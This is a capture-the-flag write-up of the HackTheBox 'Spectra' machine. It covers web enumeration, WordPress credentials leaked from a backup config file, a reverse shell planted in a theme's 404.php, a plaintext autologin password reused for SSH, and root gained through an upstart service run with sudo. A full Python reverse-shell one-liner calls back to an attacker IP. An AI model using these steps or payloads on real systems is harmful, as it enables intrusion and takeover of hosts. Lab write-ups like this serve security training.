Summary

The last old box I had to rehack and create a writeup for due to the lack of documentation. Starts basic with a test site hosting wordpress files containing wp-fonfig.php leaking the database credentials. Those credentials double as the administrator password for the wordpress site which through a template edit gives us a shell as nginx. An insecure autologin script uses a hard coded password input giving an SSH session as katie. Sudo is the last step after editing a service we have access to then running the service with sudo to achieve rce and a root shell.

Enumeration

nmap -p- 10.10.10.229

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql


nmap -p22,80,3306 -sCV 10.10.10.229

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|_  4096 52:47:de:5c:37:4f:29:0e:8e:1d:88:6e:f9:23:4d:5a (RSA)
80/tcp   open  http    nginx 1.17.4
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.17.4
3306/tcp open  mysql   MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)2024-08-162024-08-162024-08-16
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)

Port 80

front_page
Click for full image

Has two links, one leading to http://spectra.htb/main/index.php and the other to http://spectra.htb/testing/index.php.

wordpress front page
Click for full image

Simple wordpress site with no posts or activity. Could be useful if I can get credentials.

User as katie

Shell was nginx

testing index php

Odd this must be connecting to the mysql service but is unable to auth. We’ll toss a scan to see what else is at this endpoint.

dirsearch -u http://spectra.htb/testing

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/raccoon/_hacking/HackTheBox/Misc/Spectra/reports/http_spectra.htb/_testing_24-08-16_18-12-35.txt

Target: http://spectra.htb/

[18:12:35] Starting: testing/
[18:13:29] 500 -    3KB - /testing/index.php
[18:13:33] 200 -   19KB - /testing/license.txt
[18:13:52] 200 -    7KB - /testing/readme.html
[18:14:12] 200 -   11KB - /testing/wp-admin/
[18:14:12] 200 -  710B  - /testing/wp-admin/admin-ajax.php
[18:14:12] 500 -    3KB - /testing/wp-config.php
[18:14:12] 301 -  169B  - /testing/wp-admin  ->  http://spectra.htb/testing/wp-admin/
[18:14:12] 500 -    3KB - /testing/wp-admin/install.php
[18:14:12] 200 -    3KB - /testing/wp-config.php.save
[18:14:12] 200 -  627B  - /testing/wp-content/
[18:14:12] 301 -  169B  - /testing/wp-content  ->  http://spectra.htb/testing/wp-content/
[18:14:12] 200 -   69B  - /testing/wp-content/plugins/akismet/akismet.php
[18:14:12] 200 -  167B  - /testing/wp-content/plugins/hello.php
[18:14:12] 500 -    3KB - /testing/wp-admin/setup-config.php
[18:14:13] 301 -  169B  - /testing/wp-includes  ->  http://spectra.htb/testing/wp-includes/
[18:14:13] 200 -  173B  - /testing/wp-includes/rss-functions.php
[18:14:13] 200 -   25KB - /testing/wp-includes/
[18:14:13] 500 -    3KB - /testing/wp-signup.php
[18:14:13] 500 -    3KB - /testing/wp-cron.php
[18:14:13] 500 -    3KB - /testing/wp-login.php
[18:14:13] 200 -    0B  - /testing/xmlrpc.php

Without a running webapp to render these pages I can view and download any file from this wordpress testing site. Namely the /testing/wp-config.php.save is what I have my eyes set on but I do look around regardless.

wp admin listing

Nothing else here to check, onto the config file:

curl http://spectra.htb/testing/wp-config.php.save
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

...

Credentials for the database. I toss them at wordpress for no results under the username devtest. administrator:devteam1 however does let me into the wordpress admin dashboard. From here the simplest shell is to edit the 404.php template for a theme and navigate to it. I navigate to http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen and add a revshell php cmd payload.

404 upload php cmd

Then navigate to http://spectra.htb/main/wp-content/themes/twentynineteen/404.php?cmd=id

404 php cmd id

For simplicity’s sake I’ll add a pentestmonkey shell so it’s a little more stable than a bash revshell I would otherwise run here. After modifying 404.php head to http://spectra.htb/main/wp-content/themes/twentynineteen/404.php and pop the shell.

nc -nvlp 7777
Listening on 0.0.0.0 7777
Connection received on 10.10.10.229 34802
Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 AMD EPYC 7763 64-Core Processor AuthenticAMD GNU/Linux
 16:46:36 up 46 min,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
bash: cannot set terminal process group (4533): Inappropriate ioctl for device
bash: no job control in this shell
nginx@spectra / $

/etc/autologin

The OS is not linux or windows as per HTB, I should check what it is by reading /etc/lsb-release (if it exists).

nginx@spectra / $ cat /etc/lsb-release
cat /etc/lsb-release
GOOGLE_RELEASE=87.3.41
CHROMEOS_RELEASE_BRANCH_NUMBER=85
CHROMEOS_RELEASE_TRACK=stable-channel
CHROMEOS_RELEASE_KEYSET=devkeys
CHROMEOS_RELEASE_NAME=Chromium OS
CHROMEOS_AUSERVER=https://cloudready-free-update-server-2.neverware.com/update
CHROMEOS_RELEASE_BOARD=chromeover64
CHROMEOS_DEVSERVER=https://cloudready-free-update-server-2.neverware.com/
CHROMEOS_RELEASE_BUILD_NUMBER=13505
CHROMEOS_CANARY_APPID={90F229CE-83E2-4FAF-8479-E368A34938B1}
CHROMEOS_RELEASE_CHROME_MILESTONE=87
CHROMEOS_RELEASE_PATCH_NUMBER=2021_01_15_2352
CHROMEOS_RELEASE_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_BOARD_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_RELEASE_BUILD_TYPE=Developer Build - neverware
CHROMEOS_RELEASE_VERSION=87.3.41
CHROMEOS_RELEASE_DESCRIPTION=87.3.41 (Developer Build - neverware) stable-channel chromeover64

I’m not sure this changes the gameplan here. I’ll continue until an issue potentially relating to running on ChromeOS comes up.

In my rounds for anything out of the ordinary there is a script in /opt which seems to auto login users.

nginx@spectra / $ ls -l /opt
ls -l /opt
total 36
drwxr-xr-x 2 root root 4096 Jun 28  2020 VirtualBox
-rw-r--r-- 1 root root  978 Feb  3  2021 autologin.conf.orig
drwxr-xr-x 2 root root 4096 Jan 15  2021 broadcom
drwxr-xr-x 2 root root 4096 Jan 15  2021 displaylink
drwxr-xr-x 2 root root 4096 Jan 15  2021 eeti
drwxr-xr-x 5 root root 4096 Jan 15  2021 google
drwxr-xr-x 6 root root 4096 Feb  2  2021 neverware
drwxr-xr-x 5 root root 4096 Jan 15  2021 tpm1
drwxr-xr-x 5 root root 4096 Jan 15  2021 tpm2
nginx@spectra / $ cat /opt/autologin.conf.orig
cat /opt/autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
script
  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break
    fi
  done
  if [ -z "${passwd}" ]; then
    exit 0
  fi
  # Inject keys into the login prompt.
  #
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter

This uses passwords placed within /etc/autologin/passwd to perform the login and injects the keys with a python script.

find / -name "autologin.conf" 2>/dev/null
/etc/init/autologin.conf
nginx@spectra / $ cat /etc/autologin/passwd
cat /etc/autologin/passwd
SummerHereWeCome!!
ssh katie@spectra.htb

The authenticity of host 'spectra.htb (10.10.10.229)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spectra.htb,10.10.10.229' (RSA) to the list of known hosts.
Password: 
katie@spectra ~ $ sudo -l
User katie may run the following commands on spectra:
    (ALL) SETENV: NOPASSWD: /sbin/initctl
katie@spectra ~ $ cat user.txt
e89d27fe195---------------------

Root

sudo /sbin/initctl

As seen from the sudo -l check I can run a service starter as root. Services I am able to interact with are within /etc/init, so I decide to first check my groups then scan for any service I can write to.

katie@spectra ~ $ id
uid=20156(katie) gid=20157(katie) groups=20157(katie),20158(developers)
katie@spectra ~ $ ls -l /etc/init | grep developers
-rw-rw---- 1 root developers  478 Jun 29  2020 test.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test1.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test10.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test2.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test3.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test4.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test5.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test6.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test7.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test8.conf
-rw-rw---- 1 root developers  478 Jun 29  2020 test9.conf
katie@spectra ~ $ 

Simple enough I’ll add a /bin/bash copier + SUID maker to test.conf then run the service and get root.

katie@spectra ~ $ nano /etc/init/test.conf
Error in /usr/local/etc/nanorc on line 260: Error expanding /usr/share/nano/*.nanorc: No such file or directory
katie@spectra ~ $ cat /etc/init/test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    cp /bin/bash /tmp/bash
    chmod u+s /tmp/bash
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
katie@spectra ~ $ sudo /sbin/initctl start test
test start/running, process 5777
katie@spectra ~ $ ls /tmp
bash                                   disk-post-startup            uptime-lockbox-cache-start
disk-boot-complete                     disk-pre-startup             uptime-login-prompt-visible
disk-chrome-exec                       disk-shill-start             uptime-network-ethernet-configuration
disk-chrome-main                       disk-ui-post-stop            uptime-network-ethernet-no-connectivity
disk-cryptohome-unmounted              f                            uptime-network-ethernet-ready
disk-lockbox-cache-end                 firmware-boot-time           uptime-network-ethernet-registered
disk-lockbox-cache-start               mysql.sock                   uptime-other-processes-terminated
disk-login-prompt-visible              mysql.sock.lock              uptime-post-startup
disk-network-ethernet-configuration    uptime-boot-complete         uptime-pre-startup
disk-network-ethernet-no-connectivity  uptime-chrome-exec           uptime-shill-start
disk-network-ethernet-ready            uptime-chrome-main           uptime-ui-post-stop
disk-network-ethernet-registered       uptime-cryptohome-unmounted
disk-other-processes-terminated        uptime-lockbox-cache-end
katie@spectra ~ $ /tmp/bash -p
-bash: /tmp/bash: Permission denied
katie@spectra ~ $ 

That is unexpected… Oh well onto a simple python revshell for a root shell. Be sure to stop the service before editing the file.

katie@spectra ~ $ sudo /sbin/initctl stop test
test stop/waiting
katie@spectra ~ $ nano /etc/init/test.conf
Error in /usr/local/etc/nanorc on line 260: Error expanding /usr/share/nano/*.nanorc: No such file or directory
katie@spectra ~ $ cat /etc/init/test.conf
description "Test node.js server"
author      "katie"

start on filesystem or runlevel [2345]
stop on shutdown

script

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
    export HOME="/srv"
    echo $$ > /var/run/nodetest.pid
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /srv/nodetest.js

end script

pre-start script
    echo "[`date`] Node Test Starting" >> /var/log/nodetest.log
end script

pre-stop script
    rm /var/run/nodetest.pid
    echo "[`date`] Node Test Stopping" >> /var/log/nodetest.log
end script
katie@spectra ~ $ sudo /sbin/initctl start test
test start/running, process 5908
nc -nvlp 7777
Listening on 0.0.0.0 7777
Connection received on 10.10.10.229 34810
spectra / # id
id
uid=0(root) gid=0(root) groups=0(root)
spectra / # cat /root/root.txt
cat /root/root.txt
d44519713b88--------------------